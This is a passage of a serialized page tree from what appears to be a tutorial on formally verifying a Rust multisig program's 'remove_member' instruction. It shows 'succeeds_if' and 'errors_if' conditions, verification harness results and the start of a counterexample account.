remove_member",{"type":28,"tag":116,"props":25422,"children":25423},{"style":266},[25424],{"type":33,"value":313},{"type":28,"tag":116,"props":25426,"children":25427},{"style":272},[25428],{"type":33,"value":19944},{"type":28,"tag":116,"props":25430,"children":25431},{"style":370},[25432],{"type":33,"value":4160},{"type":28,"tag":116,"props":25434,"children":25435},{"style":339},[25436],{"type":33,"value":19953},{"type":28,"tag":116,"props":25438,"children":25439},{"style":266},[25440],{"type":33,"value":514},{"type":28,"tag":116,"props":25442,"children":25443},{"style":339},[25444],{"type":33,"value":25445},"MsAuth",{"type":28,"tag":116,"props":25447,"children":25448},{"style":266},[25449],{"type":33,"value":6302},{"type":28,"tag":116,"props":25451,"children":25452},{"style":272},[25453],{"type":33,"value":25454},"old_member",{"type":28,"tag":116,"props":25456,"children":25457},{"style":370},[25458],{"type":33,"value":4160},{"type":28,"tag":116,"props":25460,"children":25461},{"style":339},[25462],{"type":33,"value":20520},{"type":28,"tag":116,"props":25464,"children":25465},{"style":266},[25466],{"type":33,"value":1609},{"type":28,"tag":116,"props":25468,"children":25469},{"style":370},[25470],{"type":33,"value":13423},{"type":28,"tag":116,"props":25472,"children":25473},{"style":339},[25474],{"type":33,"value":13428},{"type":28,"tag":116,"props":25476,"children":25477},{"style":266},[25478],{"type":33,"value":19995},{"type":28,"tag":116,"props":25480,"children":25481},{"class":245,"line":981},[25482],{"type":28,"tag":116,"props":25483,"children":25484},{"style":250},[25485],{"type":33,"value":25486},"    // if there is only one key in this multisig, reject the removal\n",{"type":28,"tag":116,"props":25488,"children":25489},{"class":245,"line":1011},[25490,25494,25499,25503,25507,25511,25515,25519,25523,25527,25531,25535,25539,25543],{"type":28,"tag":116,"props":25491,"children":25492},{"style":260},[25493],{"type":33,"value":11947},{"type":28,"tag":116,"props":25495,"children":25496},{"style":272},[25497],{"type":33,"value":25498}," ctx",{"type":28,"tag":116,"props":25500,"children":25501},{"style":370},[25502],{"type":33,"value":141},{"type":28,"tag":116,"props":25504,"children":25505},{"style":266},[25506],{"type":33,"value":14341},{"type":28,"tag":116,"props":25508,"children":25509},{"style":370},[25510],{"type":33,"value":141},{"type":28,"tag":116,"props":25512,"children":25513},{"style":266},[25514],{"type":33,"value":23465},{"type":28,"tag":116,"props":25516,"children":25517},{"style":370},[25518],{"type":33,"value":141},{"type":28,"tag":116,"props":25520,"children":25521},{"style":266},[25522],{"type":33,"value":20646},{"type":28,"tag":116,"props":25524,"children":25525},{"style":370},[25526],{"type":33,"value":141},{"type":28,"tag":116,"props":25528,"children":25529},{"style":282},[25530],{"type":33,"value":8807},{"type":28,"tag":116,"props":25532,"children":25533},{"style":266},[25534],{"type":33,"value":13709},{"type":28,"tag":116,"props":25536,"children":25537},{"style":370},[25538],{"type":33,"value":2340},{"type":28,"tag":116,"props":25540,"children":25541},{"style":350},[25542],{"type":33,"value":4192},{"type":28,"tag":116,"props":25544,"children":25545},{"style":266},[25546],{"type":33,"value":1291},{"type":28,"tag":116,"props":25548,"children":25549},{"class":245,"line":1029},[25550,25554,25558,25562,25566,25570,25575],{"type":28,"tag":116,"props":25551,"children":25552},{"style":260},[25553],{"type":33,"value":15405},{"type":28,"tag":116,"props":25555,"children":25556},{"style":282},[25557],{"type":33,"value":23181},{"type":28,"tag":116,"props":25559,"children":25560},{"style":266},[25561],{"type":33,"value":313},{"type":28,"tag":116,"props":25563,"children":25564},{"style":339},[25565],{"type":33,"value":23190},{"type":28,"tag":116,"props":25567,"children":25568},{"style":370},[25569],{"type":33,"value":3151},{"type":28,"tag":116,"props":25571,"children":25572},{"style":339},[25573],{"type":33,"value":25574},"CannotRemoveSoloMember",{"type":28,"tag":116,"props":25576,"children":25577},{"style":266},[25578],{"type":33,"value":895},{"type":28,"tag":116,"props":25580,"children":25581},{"class":245,"line":1038},[25582],{"type":28,"tag":116,"props":25583,"children":25584},{"style":266},[25585],{"type":33,"value":3025},{"type":28,"tag":116,"props":25587,"children":25588},{"class":245,"line":1047},[25589,25593,25597,25601,25605,25609,25613,25617,25621,25625,25629,25633],{"type":28,"tag":116,"props":25590,"children":25591},{"style":272},[25592],{"type":33,"value":19887},{"type":28,"tag":116,"props":25594,"children":25595},{"style":370},[25596],{"type":33,"value":141},{"type":28,"tag":116,"props":25598,"children":25599},{"style":266},[25600],{"type":33,"value":14341},{"type":28,"tag":116,"props":25602,"children":25603},{"style":370},[25604],{"type":33,"value":141},{"type":28,"tag":116,"props":25606,"children":25607},{"style":266},[25608],{"type":33,"value":23465},{"type":28,"tag":116,"props":25610,"children":25611},{"style":370},[25612],{"type":33,"value":141},{"type":28,"tag":116,"props":25614,"children":25615},{"style":282},[25616],{"type":33,"value":25121},{"type":28,"tag":116,"props":25618,"children":25619},{"style":266},[25620],{"type":33,"value":313},{"type":28,"tag":116,"props":25622,"children":25623},{"style":272},[25624],{"type":33,"value":25454},{"type":28,"tag":116,"props":25626,"children":25627},{"style":266},[25628],{"type":33,"value":1829},{"type":28,"tag":116,"props":25630,"children":25631},{"style":370},[25632],{"type":33,"value":2825},{"type":28,"tag":116,"props":25634,"children":25635},{"style":266},[25636],{"type":33,"value":384},{"type":28,"tag":116,"props":25638,"children":25639},{"class":245,"line":1071},[25640],{"type":28,"tag":116,"props":25641,"children":25642},{"emptyLinePlaceholder":19},[25643],{"type":33,"value":1044},{"type":28,"tag":116,"props":25645,"children":25646},{"class":245,"line":1137},[25647],{"type":28,"tag":116,"props":25648,"children":25649},{"style":250},[25650],{"type":33,"value":25651},"    // if the number of keys is now less than the threshold, adjust it\n",{"type":28,"tag":116,"props":25653,"children":25654},{"class":245,"line":1181},[25655,25659,25663,25667,25671,25675,25679,25683,25687,25691,25695,25700,25704,25708,25712,25716,25720,25724,25728,25732,25736,25740],{"type":28,"tag":116,"props":25656,"children":25657},{"style":260},[25658],{"type":33,"value":11947},{"type":28,"tag":116,"props":25660,"children":25661},{"style":272},[25662],{"type":33,"value":25498},{"type":28,"tag":116,"props":25664,"children":25665},{"style":370},[25666],{"type":33,"value":141},{"type":28,"tag":116,"props":25668,"children":25669},{"style":266},[25670],{"type":33,"value":14341},{"type":28,"tag":116,"props":25672,"children":25673},{"style":370},[25674],{"type":33,"value":141},{"type":28,"tag":116,"props":25676,"children":25677},{"style":266},[25678],{"type":33,"value":23465},{"type":28,"tag":116,"props":25680,"children":25681},{"style":370},[25682],{"type":33,"value":141},{"type":28,"tag":116,"props":25684,"children":25685},{"style":266},[25686],{"type":33,"value":20646},{"type":28,"tag":116,"props":25688,"children":25689},{"style":370},[25690],{"type":33,"value":141},{"type":28,"tag":116,"props":25692,"children":25693},{"style":282},[25694],{"type":33,"value":8807},{"type":28,"tag":116,"props":25696,"children":25697},{"style":266},[25698],{"type":33,"value":25699},"() \u003C ",{"type":28,"tag":116,"props":25701,"children":25702},{"style":339},[25703],{"type":33,"value":16263},{"type":28,"tag":116,"props":25705,"children":25706},{"style":370},[25707],{"type":33,"value":3151},{"type":28,"tag":116,"props":25709,"children":25710},{"style":282},[25711],{"type":33,"value":19137},{"type":28,"tag":116,"props":25713,"children":25714},{"style":266},[25715],{"type":33,"value":313},{"type":28,"tag":116,"props":25717,"children":25718},{"style":272},[25719],{"type":33,"value":19944},{"type":28,"tag":116,"props":25721,"children":25722},{"style":370},[25723],{"type":33,"value":141},{"type":28,"tag":116,"props":25725,"children":25726},{"style":266},[25727],{"type":33,"value":14341},{"type":28,"tag":116,"props":25729,"children":25730},{"style":370},[25731],{"type":33,"value":141},{"type":28,"tag":116,"props":25733,"children":25734},{"style":266},[25735],{"type":33,"value":23465},{"type":28,"tag":116,"props":25737,"children":25738},{"style":370},[25739],{"type":33,"value":141},{"type":28,"tag":116,"props":25741,"children":25742},{"style":266},[25743],{"type":33,"value":25744},"threshold) {\n",{"type":28,"tag":116,"props":25746,"children":25747},{"class":245,"line":1212},[25748,25752,25757,25761,25765,25769,25773,25777,25781,25785,25789,25793,25797,25801,25805,25809,25813,25818,25822,25826,25830],{"type":28,"tag":116,"props":25749,"children":25750},{"style":376},[25751],{"type":33,"value":2736},{"type":28,"tag":116,"props":25753,"children":25754},{"style":272},[25755],{"type":33,"value":25756}," new_threshold",{"type":28,"tag":116,"props":25758,"children":25759},{"style":370},[25760],{"type":33,"value":4160},{"type":28,"tag":116,"props":25762,"children":25763},{"style":339},[25764],{"type":33,"value":20693},{"type":28,"tag":116,"props":25766,"children":25767},{"style":370},[25768],{"type":33,"value":2226},{"type":28,"tag":116,"props":25770,"children":25771},{"style":272},[25772],{"type":33,"value":25498},{"type":28,"tag":116,"props":25774,"children":25775},{"style":370},[25776],{"type":33,"value":141},{"type":28,"tag":116,"props":25778,"children":25779},{"style":266},[25780],{"type":33,"value":14341},{"type":28,"tag":116,"props":25782,"children":25783},{"style":370},[25784],{"type":33,"value":141},{"type":28,"tag":116,"props":25786,"children":25787},{"style":266},[25788],{"type":33,"value":23465},{"type":28,"tag":116,"props":25790,"children":25791},{"style":370},[25792],{"type":33,"value":141},{"type":28,"tag":116,"props":25794,"children":25795},{"style":266},[25796],{"type":33,"value":20646},{"type":28,"tag":116,"props":25798,"children":25799},{"style":370},[25800],{"type":33,"value":141},{"type":28,"tag":116,"props":25802,"children":25803},{"style":282},[25804],{"type":33,"value":8807},{"type":28,"tag":116,"props":25806,"children":25807},{"style":266},[25808],{"type":33,"value":13545},{"type":28,"tag":116,"props":25810,"children":25811},{"style":370},[25812],{"type":33,"value":141},{"type":28,"tag":116,"props":25814,"children":25815},{"style":282},[25816],{"type":33,"value":25817},"try_into",{"type":28,"tag":116,"props":25819,"children":25820},{"style":266},[25821],{"type":33,"value":13545},{"type":28,"tag":116,"props":25823,"children":25824},{"style":370},[25825],{"type":33,"value":141},{"type":28,"tag":116,"props":25827,"children":25828},{"style":282},[25829],{"type":33,"value":3336},{"type":28,"tag":116,"props":25831,"children":25832},{"style":266},[25833],{"type":33,"value":1445},{"type":28,"tag":116,"props":25835,"children":25836},{"class":245,"line":1254},[25837,25842,25846,25850,25854,25858,25862,25867,25871,25876,25880,25884],{"type":28,"tag":116,"props":25838,"children":25839},{"style":272},[25840],{"type":33,"value":25841},"        ctx",{"type":28,"tag":116,"props":25843,"children":25844},{"style":370},[25845],{"type":33,"value":141},{"type":28,"tag":116,"props":25847,"children":25848},{"style":266},[25849],{"type":33,"value":14341},{"type":28,"tag":116,"props":25851,"children":25852},{"style":370},[25853],{"type":33,"value":141},{"type":28,"tag":116,"props":25855,"children":25856},{"style":266},[25857],{"type":33,"value":23465},{"type":28,"tag":116,"props":25859,"children":25860},{"style":370},[25861],{"type":33,"value":141},{"type":28,"tag":116,"props":25863,"children":25864},{"style":282},[25865],{"type":33,"value":25866},"change_threshold",{"type":28,"tag":116,"props":25868,"children":25869},{"style":266},[25870],{"type":33,"value":313},{"type":28,"tag":116,"props":25872,"children":25873},{"style":272},[25874],{"type":33,"value":25875},"new_threshold",{"type":28,"tag":116,"props":25877,"children":25878},{"style":266},[25879],{"type":33,"value":1829},{"type":28,"tag":116,"props":25881,"children":25882},{"style":370},[25883],{"type":33,"value":2825},{"type":28,"tag":116,"props":25885,"children":25886},{"style":266},[25887],{"type":33,"value":384},{"type":28,"tag":116,"props":25889,"children":25890},{"class":245,"line":1262},[25891],{"type":28,"tag":116,"props":25892,"children":25893},{"style":266},[25894],{"type":33,"value":3025},{"type":28,"tag":116,"props":25896,"children":25897},{"class":245,"line":1294},[25898,25902,25907,25911,25915,25919,25923,25927,25931,25935],{"type":28,"tag":116,"props":25899,"children":25900},{"style":376},[25901],{"type":33,"value":2672},{"type":28,"tag":116,"props":25903,"children":25904},{"style":272},[25905],{"type":33,"value":25906}," new_index",{"type":28,"tag":116,"props":25908,"children":25909},{"style":370},[25910],{"type":33,"value":2226},{"type":28,"tag":116,"props":25912,"children":25913},{"style":272},[25914],{"type":33,"value":25498},{"type":28,"tag":116,"props":25916,"children":25917},{"style":370},[25918],{"type":33,"value":141},{"type":28,"tag":116,"props":25920,"children":25921},{"style":266},[25922],{"type":33,"value":14341},{"type":28,"tag":116,"props":25924,"children":25925},{"style":370},[25926],{"type":33,"value":141},{"type":28,"tag":116,"props":25928,"children":25929},{"style":266},[25930],{"type":33,"value":23465},{"type":28,"tag":116,"props":25932,"children":25933},{"style":370},[25934],{"type":33,"value":141},{"type":28,"tag":116,"props":25936,"children":25937},{"style":266},[25938],{"type":33,"value":25939},"transaction_index;\n",{"type":28,"tag":116,"props":25941,"children":25942},{"class":245,"line":1334},[25943,25947,25951,25955,25959,25963,25967,25972,25976,25981],{"type":28,"tag":116,"props":25944,"children":25945},{"style":272},[25946],{"type":33,"value":19887},{"type":28,"tag":116,"props":25948,"children":25949},{"style":370},[25950],{"type":33,"value":141},{"type":28,"tag":116,"props":25952,"children":25953},{"style":266},[25954],{"type":33,"value":14341},{"type":28,"tag":116,"props":25956,"children":25957},{"style":370},[25958],{"type":33,"value":141},{"type":28,"tag":116,"props":25960,"children":25961},{"style":266},[25962],{"type":33,"value":23465},{"type":28,"tag":116,"props":25964,"children":25965},{"style":370},[25966],{"type":33,"value":141},{"type":28,"tag":116,"props":25968,"children":25969},{"style":282},[25970],{"type":33,"value":25971},"set_change_index",{"type":28,"tag":116,"props":25973,"children":25974},{"style":266},[25975],{"type":33,"value":313},{"type":28,"tag":116,"props":25977,"children":25978},{"style":272},[25979],{"type":33,"value":25980},"new_index",{"type":28,"tag":116,"props":25982,"children":25983},{"style":266},[25984],{"type":33,"value":2830},{"type":28,"tag":116,"props":25986,"children":25987},{"class":245,"line":1372},[25988],{"type":28,"tag":116,"props":25989,"children":25990},{"style":266},[25991],{"type":33,"value":406},{"type":28,"tag":29,"props":25993,"children":25994},{},[25995,25997,26002],{"type":33,"value":25996},"First let's establish the ",{"type":28,"tag":98,"props":25998,"children":26000},{"className":25999},[],[26001],{"type":33,"value":19818},{"type":33,"value":26003}," condition. We can do this either interactively, following counterexamples like in the first example or we can guess what a sufficient condition might be:",{"type":28,"tag":234,"props":26005,"children":26007},{"code":26006,"language":2651,"meta":7,"className":2652,"style":7},"#[succeeds_if(\n    ctx.accounts.multisig.keys.len() > 1\n)]\nfn remove_member(...) { ... }\n",[26008],{"type":28,"tag":98,"props":26009,"children":26010},{"__ignoreMap":7},[26011,26018,26065,26072],{"type":28,"tag":116,"props":26012,"children":26013},{"class":245,"line":246},[26014],{"type":28,"tag":116,"props":26015,"children":26016},{"style":266},[26017],{"type":33,"value":23766},{"type":28,"tag":116,"props":26019,"children":26020},{"class":245,"line":256},[26021,26025,26029,26033,26037,26041,26045,26049,26053,26057,26061],{"type":28,"tag":116,"props":26022,"children":26023},{"style":266},[26024],{"type":33,"value":19887},{"type":28,"tag":116,"props":26026,"children":26027},{"style":370},[26028],{"type":33,"value":141},{"type":28,"tag":116,"props":26030,"children":26031},{"style":266},[26032],{"type":33,"value":14341},{"type":28,"tag":116,"props":26034,"children":26035},{"style":370},[26036],{"type":33,"value":141},{"type":28,"tag":116,"props":26038,"children":26039},{"style":266},[26040],{"type":33,"value":23465},{"type":28,"tag":116,"props":26042,"children":26043},{"style":370},[26044],{"type":33,"value":141},{"type":28,"tag":116,"props":26046,"children":26047},{"style":266},[26048],{"type":33,"value":20646},{"type":28,"tag":116,"props":26050,"children":26051},{"style":370},[26052],{"type":33,"value":141},{"type":28,"tag":116,"props":26054,"children":26055},{"style":266},[26056],{"type":33,"value":20684},{"type":28,"tag":116,"props":26058,"children":26059},{"style":370},[26060],{"type":33,"value":645},{"type":28,"tag":116,"props":26062,"children":26063},{"style":266},[26064],{"type":33,"value":19106},{"type":28,"tag":116,"props":26066,"children":26067},{"class":245,"line":293},[26068],{"type":28,"tag":116,"props":26069,"children":26070},{"style":266},[26071],{"type":33,"value":19922},{"type":28,"tag":116,"props":26073,"children":26074},{"class":245,"line":361},[26075,26079,26083,26087,26091,26095,26099],{"type":28,"tag":116,"props":26076,"children":26077},{"style":376},[26078],{"type":33,"value":19930},{"type":28,"tag":116,"props":26080,"children":26081},{"style":282},[26082],{"type":33,"value":25420},{"type":28,"tag":116,"props":26084,"children":26085},{"style":266},[26086],{"type":33,"value":313},{"type":28,"tag":116,"props":26088,"children":26089},{"style":370},[26090],{"type":33,"value":9259},{"type":28,"tag":116,"props":26092,"children":26093},{"style":266},[26094],{"type":33,"value":23643},{"type":28,"tag":116,"props":26096,"children":26097},{"style":370},[26098],{"type":33,"value":9259},{"type":28,"tag":116,"props":26100,"children":26101},{"style":266},[26102],{"type":33,"value":9264},{"type":28,"tag":29,"props":26104,"children":26105},{},[26106,26108,26113],{"type":33,"value":26107},"And for now let's remove the invariant on the ",{"type":28,"tag":98,"props":26109,"children":26111},{"className":26110},[],[26112],{"type":33,"value":22404},{"type":33,"value":26114}," account:",{"type":28,"tag":234,"props":26116,"children":26118},{"code":26117,"language":2651,"meta":7,"className":2652,"style":7},"#[invariant()]\npub struct Ms { ... }\n",[26119],{"type":28,"tag":98,"props":26120,"children":26121},{"__ignoreMap":7},[26122,26130],{"type":28,"tag":116,"props":26123,"children":26124},{"class":245,"line":246},[26125],{"type":28,"tag":116,"props":26126,"children":26127},{"style":266},[26128],{"type":33,"value":26129},"#[invariant()]\n",{"type":28,"tag":116,"props":26131,"children":26132},{"class":245,"line":256},[26133,26137,26141,26145,26149,26153],{"type":28,"tag":116,"props":26134,"children":26135},{"style":376},[26136],{"type":33,"value":13356},{"type":28,"tag":116,"props":26138,"children":26139},{"style":376},[26140],{"type":33,"value":20814},{"type":28,"tag":116,"props":26142,"children":26143},{"style":339},[26144],{"type":33,"value":20819},{"type":28,"tag":116,"props":26146,"children":26147},{"style":266},[26148],{"type":33,"value":9254},{"type":28,"tag":116,"props":26150,"children":26151},{"style":370},[26152],{"type":33,"value":9259},{"type":28,"tag":116,"props":26154,"children":26155},{"style":266},[26156],{"type":33,"value":9264},{"type":28,"tag":29,"props":26158,"children":26159},{},[26160],{"type":33,"value":26161},"Let's test this!",{"type":28,"tag":29,"props":26163,"children":26164},{},[26165,26167,26172],{"type":33,"value":26166},"Our ",{"type":28,"tag":98,"props":26168,"children":26170},{"className":26169},[],[26171],{"type":33,"value":19818},{"type":33,"value":26173}," harness produces:",{"type":28,"tag":234,"props":26175,"children":26177},{"code":26176},"VERIFICATION:- SUCCESSFUL\nVerification Time: 28.119272s\n",[26178],{"type":28,"tag":98,"props":26179,"children":26180},{"__ignoreMap":7},[26181],{"type":33,"value":26176},{"type":28,"tag":29,"props":26183,"children":26184},{},[26185],{"type":33,"value":26186},"This tells us that if our multisig has at least two keys then the instruction will succeed.",{"type":28,"tag":29,"props":26188,"children":26189},{},[26190,26192,26197],{"type":33,"value":26191},"However, remember that since ",{"type":28,"tag":98,"props":26193,"children":26195},{"className":26194},[],[26196],{"type":33,"value":19818},{"type":33,"value":26198}," represents just the sufficient conditions, there may be other cases where the function succeeds.",{"type":28,"tag":29,"props":26200,"children":26201},{},[26202,26204,26209,26211,26216,26218,26223],{"type":33,"value":26203},"Suppose we want to be sure that this condition is the ",{"type":28,"tag":2583,"props":26205,"children":26206},{},[26207],{"type":33,"value":26208},"only condition",{"type":33,"value":26210}," in which the function will succeed (i.e. ",{"type":28,"tag":2583,"props":26212,"children":26213},{},[26214],{"type":33,"value":26215},"\"the function will succeed if and only if the multisig has at least two keys\"",{"type":33,"value":26217},"). We could attempt to verify the other side of this with an ",{"type":28,"tag":98,"props":26219,"children":26221},{"className":26220},[],[26222],{"type":33,"value":19825},{"type":33,"value":26224}," macro such as:",{"type":28,"tag":234,"props":26226,"children":26228},{"code":26227,"language":2651,"meta":7,"className":2652,"style":7},"#[succeeds_if(\n    ctx.accounts.multisig.keys.len() > 1\n)]\n#[errors_if(\n    ctx.accounts.multisig.keys.len() \u003C= 1\n)]\nfn remove_member(...) { ... }\n",[26229],{"type":28,"tag":98,"props":26230,"children":26231},{"__ignoreMap":7},[26232,26239,26286,26293,26300,26347,26354],{"type":28,"tag":116,"props":26233,"children":26234},{"class":245,"line":246},[26235],{"type":28,"tag":116,"props":26236,"children":26237},{"style":266},[26238],{"type":33,"value":23766},{"type":28,"tag":116,"props":26240,"children":26241},{"class":245,"line":256},[26242,26246,26250,26254,26258,26262,26266,26270,26274,26278,26282],{"type":28,"tag":116,"props":26243,"children":26244},{"style":266},[26245],{"type":33,"value":19887},{"type":28,"tag":116,"props":26247,"children":26248},{"style":370},[26249],{"type":33,"value":141},{"type":28,"tag":116,"props":26251,"children":26252},{"style":266},[26253],{"type":33,"value":14341},{"type":28,"tag":116,"props":26255,"children":26256},{"style":370},[26257],{"type":33,"value":141},{"type":28,"tag":116,"props":26259,"children":26260},{"style":266},[26261],{"type":33,"value":23465},{"type":28,"tag":116,"props":26263,"children":26264},{"style":370},[26265],{"type":33,"value":141},{"type":28,"tag":116,"props":26267,"children":26268},{"style":266},[26269],{"type":33,"value":20646},{"type":28,"tag":116,"props":26271,"children":26272},{"style":370},[26273],{"type":33,"value":141},{"type":28,"tag":116,"props":26275,"children":26276},{"style":266},[26277],{"type":33,"value":20684},{"type":28,"tag":116,"props":26279,"children":26280},{"style":370},[26281],{"type":33,"value":645},{"type":28,"tag":116,"props":26283,"children":26284},{"style":266},[26285],{"type":33,"value":19106},{"type":28,"tag":116,"props":26287,"children":26288},{"class":245,"line":293},[26289],{"type":28,"tag":116,"props":26290,"children":26291},{"style":266},[26292],{"type":33,"value":19922},{"type":28,"tag":116,"props":26294,"children":26295},{"class":245,"line":361},[26296],{"type":28,"tag":116,"props":26297,"children":26298},{"style":266},[26299],{"type":33,"value":19879},{"type":28,"tag":116,"props":26301,"children":26302},{"class":245,"line":387},[26303,26307,26311,26315,26319,26323,26327,26331,26335,26339,26343],{"type":28,"tag":116,"props":26304,"children":26305},{"style":266},[26306],{"type":33,"value":19887},{"type":28,"tag":116,"props":26308,"children":26309},{"style":370},[26310],{"type":33,"value":141},{"type":28,"tag":116,"props":26312,"children":26313},{"style":266},[26314],{"type":33,"value":14341},{"type":28,"tag":116,"props":26316,"children":26317},{"style":370},[26318],{"type":33,"value":141},{"type":28,"tag":116,"props":26320,"children":26321},{"style":266},[26322],{"type":33,"value":23465},{"type":28,"tag":116,"props":26324,"children":26325},{"style":370},[26326],{"type":33,"value":141},{"type":28,"tag":116,"props":26328,"children":26329},{"style":266},[26330],{"type":33,"value":20646},{"type":28,"tag":116,"props":26332,"children":26333},{"style":370},[26334],{"type":33,"value":141},{"type":28,"tag":116,"props":26336,"children":26337},{"style":266},[26338],{"type":33,"value":20684},{"type":28,"tag":116,"props":26340,"children":26341},{"style":370},[26342],{"type":33,"value":19078},{"type":28,"tag":116,"props":26344,"children":26345},{"style":266},[26346],{"type":33,"value":19106},{"type":28,"tag":116,"props":26348,"children":26349},{"class":245,"line":400},[26350],{"type":28,"tag":116,"props":26351,"children":26352},{"style":266},[26353],{"type":33,"value":19922},{"type":28,"tag":116,"props":26355,"children":26356},{"class":245,"line":614},[26357,26361,26365,26369,26373,26377,26381],{"type":28,"tag":116,"props":26358,"children":26359},{"style":376},[26360],{"type":33,"value":19930},{"type":28,"tag":116,"props":26362,"children":26363},{"style":282},[26364],{"type":33,"value":25420},{"type":28,"tag":116,"props":26366,"children":26367},{"style":266},[26368],{"type":33,"value":313},{"type":28,"tag":116,"props":26370,"children":26371},{"style":370},[26372],{"type":33,"value":9259},{"type":28,"tag":116,"props":26374,"children":26375},{"style":266},[26376],{"type":33,"value":23643},{"type":28,"tag":116,"props":26378,"children":26379},{"style":370},[26380],{"type":33,"value":9259},{"type":28,"tag":116,"props":26382,"children":26383},{"style":266},[26384],{"type":33,"value":9264},{"type":28,"tag":29,"props":26386,"children":26387},{},[26388,26390,26395],{"type":33,"value":26389},"Let's test this, we just need to run the new ",{"type":28,"tag":98,"props":26391,"children":26393},{"className":26392},[],[26394],{"type":33,"value":19825},{"type":33,"value":26396}," harness:",{"type":28,"tag":234,"props":26398,"children":26400},{"code":26399},"VERIFICATION:- FAILED\nVerification Time: 31.900913s\n",[26401],{"type":28,"tag":98,"props":26402,"children":26403},{"__ignoreMap":7},[26404],{"type":33,"value":26399},{"type":28,"tag":29,"props":26406,"children":26407},{},[26408],{"type":33,"value":26409},"Hmm, this verification failed! Let's look at the counterexample. The multisig it is trying to remove a member from looks like:",{"type":28,"tag":234,"props":26411,"children":26413},{"code":26412,"language":2651,"meta":7,"className":2652,"style":7},"Account {\n    account: Ms {\n        threshold: 0,\n        authority_index: 0,\n        transaction_index: 0,\n        ms_change_index: 0,\n        bump: 0,\n        create_key: ...,\n        allow_external_execute: false,\n        keys: Vec {\n            data: ...,\n            size: 0,\n        },\n    },\n    info: AccountInfo { ... },\n}\n",[26414],{"type":28,"tag":98,"props":26415,"children":26416},{"__ignoreMap":7},[26417,26428,26447,26466,26485,26504,26523,26542,26561,26580,26599,26619,26638,26645,26652,26679],{"type":28,"tag":116,"props":26418,"children":26419},{"class":245,"line":246},[26420,26424],{"type":28,"tag":116,"props":26421,"children":26422},{"style":339},[26423],{"type":33,"value":16807},{"type":28,"tag":116,"props":26425,"children":26426},{"style":266},[26427],{"type":33,"value":1291},{"type":28,"tag":116,"props":26429,"children":26430},{"class":245,"line":256},[26431,26435,26439,26443],{"type":28,"tag":116,"props":26432,"children":26433},{"style":272},[26434],{"type":33,"value":24826},{"type":28,"tag":116,"props":26436,"children":26437},{"style":370},[26438],{"type":33,"value":4160},{"type":28,"tag":116,"props":26440,"children":26441},{"style":339},[26442],{"type":33,"value":20819},{"type":28,"tag":116,"props":26444,"children":26445},{"style":266},[26446],{"type":33,"value":1291},{"type":28,"tag":116,"props":26448,"children":26449},{"class":245,"line":293},[26450,26454,26458,26462],{"type":28,"tag":116,"props":26451,"children":26452},{"style":272},[26453],{"type":33,"value":23485},{"type":28,"tag":116,"props":26455,"children":26456},{"style":370},[26457],{"type":33,"value":4160},{"type":28,"tag":116,"props":26459,"children":26460},{"style":350},[26461],{"type":33,"value":2718},{"type":28,"tag":116,"props":26463,"children":26464},{"style":266},[26465],{"type":33,"value":3178},{"type":28,"tag":116,"props":26467,"children":26468},{"class":245,"line":361},[26469,26473,26477,26481],{"type":28,"tag":116,"props":26470,"children":26471},{"style":272},[26472],{"type":33,"value":24866},{"type":28,"tag":116,"props":26474,"children":26475},{"style":370},[26476],{"type":33,"value":4160},{"type":28,"tag":116,"props":26478,"children":26479},{"style":350},[26480],{"type":33,"value":2718},{"type":28,"tag":116,"props":26482,"children":26483},{"style":266},[26484],{"type":33,"value":3178},{"type":28,"tag":116,"props":26486,"children":26487},{"class":245,"line":387},[26488,26492,26496,26500],{"type":28,"tag":116,"props":26489,"children":26490},{"style":272},[26491],{"type":33,"value":24886},{"type":28,"tag":116,"props":26493,"children":26494},{"style":370},[26495],{"type":33,"value":4160},{"type":28,"tag":116,"props":26497,"children":26498},{"style":350},[26499],{"type":33,"value":2718},{"type":28,"tag":116,"props":26501,"children":26502},{"style":266},[26503],{"type":33,"value":3178},{"type":28,"tag":116,"props":26505,"children":26506},{"class":245,"line":400},[26507,26511,26515,26519],{"type":28,"tag":116,"props":26508,"children":26509},{"style":272},[26510],{"type":33,"value":24906},{"type":28,"tag":116,"props":26512,"children":26513},{"style":370},[26514],{"type":33,"value":4160},{"type":28,"tag":116,"props":26516,"children":26517},{"style":350},[26518],{"type":33,"value":2718},{"type":28,"tag":116,"props":26520,"children":26521},{"style":266},[26522],{"type":33,"value":3178},{"type":28,"tag":116,"props":26524,"children":26525},{"class":245,"line":614},[26526,26530,26534,26538],{"type":28,"tag":116,"props":26527,"children":26528},{"style":272},[26529],{"type":33,"value":24926},{"type":28,"tag":116,"props":26531,"children":26532},{"style":370},[26533],{"type":33,"value":4160},{"type":28,"tag":116,"props":26535,"children":26536},{"style":350},[26537],{"type":33,"value":2718},{"type":28,"tag":116,"props":26539,"children":26540},{"style":266},[26541],{"type":33,"value":3178},{"type":28,"tag":116,"props":26543,"children":26544},{"class":245,"line":631},[26545,26549,26553,26557],{"type":28,"tag":116,"props":26546,"children":26547},{"style":272},[26548],{"type":33,"value":23497},{"type":28,"tag":116,"props":26550,"children":26551},{"style":370},[26552],{"type":33,"value":4160},{"type":28,"tag":116,"props":26554,"children":26555},{"style":370},[26556],{"type":33,"value":24954},{"type":28,"tag":116,"props":26558,"children":26559},{"style":266},[26560],{"type":33,"value":3178},{"type":28,"tag":116,"props":26562,"children":26563},{"class":245,"line":665},[26564,26568,26572,26576],{"type":28,"tag":116,"props":26565,"children":26566},{"style":272},[26567],{"type":33,"value":24966},{"type":28,"tag":116,"props":26569,"children":26570},{"style":370},[26571],{"type":33,"value":4160},{"type":28,"tag":116,"props":26573,"children":26574},{"style":376},[26575],{"type":33,"value":1022},{"type":28,"tag":116,"props":26577,"children":26578},{"style":266},[26579],{"type":33,"value":3178},{"type":28,"tag":116,"props":26581,"children":26582},{"class":245,"line":713},[26583,26587,26591,26595],{"type":28,"tag":116,"props":26584,"children":26585},{"style":272},[26586],{"type":33,"value":24986},{"type":28,"tag":116,"props":26588,"children":26589},{"style":370},[26590],{"type":33,"value":4160},{"type":28,"tag":116,"props":26592,"children":26593},{"style":339},[26594],{"type":33,"value":21052},{"type":28,"tag":116,"props":26596,"children":26597},{"style":266},[26598],{"type":33,"value":1291},{"type":28,"tag":116,"props":26600,"children":26601},{"class":245,"line":750},[26602,26607,26611,26615],{"type":28,"tag":116,"props":26603,"children":26604},{"style":272},[26605],{"type":33,"value":26606},"            